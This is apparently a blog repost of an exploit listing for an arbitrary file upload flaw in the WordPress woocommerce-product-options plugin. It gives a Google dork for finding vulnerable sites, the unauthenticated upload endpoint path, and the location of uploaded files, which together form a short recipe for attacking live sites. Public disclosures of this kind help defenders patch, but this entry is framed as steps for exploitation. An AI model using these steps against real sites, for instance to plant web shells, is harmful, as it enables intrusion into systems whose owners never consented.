WordPress Plugins woocommerce-product-options - Arbitrary File Upload
WordPress Plugins woocommerce-product-options - Arbitrary File Upload
2017.08.25 |
j!h4dDZ |
Medium |
N/A |
N/A |
No |
Yes |
Dork: inurl:wp-content/plugins/woocommerce-product-options |
# Exploit Title: WordPress Plugins woocommerce-product-options - Arbitrary File Upload
# Date: 24/08/017
# Exploit Author: j!h4dDZ
# Tested on: Windows 7
============================================================================
1)---------- Search target with Google Dorking-----------------------------
inurl:wp-content/plugins/woocommerce-product-options
Index of wp-content/plugins/woocommerce-product-options
2)--------------------Exploit the websites---------------------------------
-----------------------File Upload-----------------------------------------
(PoC)
https://localhost/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
------------------------------------------------------------------------------
4) --------------------------Location File:----------------------------------
http://localhost/wp-content/uploads/FILE.jpg
atau
http://localhost/wp-content/uploads/tahun/tgl/file.jpg
WordPress Plugins woocommerce-product-options - Arbitrary File Upload
Reviewed by Izza009
on
00.17
Rating:
Reviewed by Izza009
on
00.17
Rating:
Tidak ada komentar: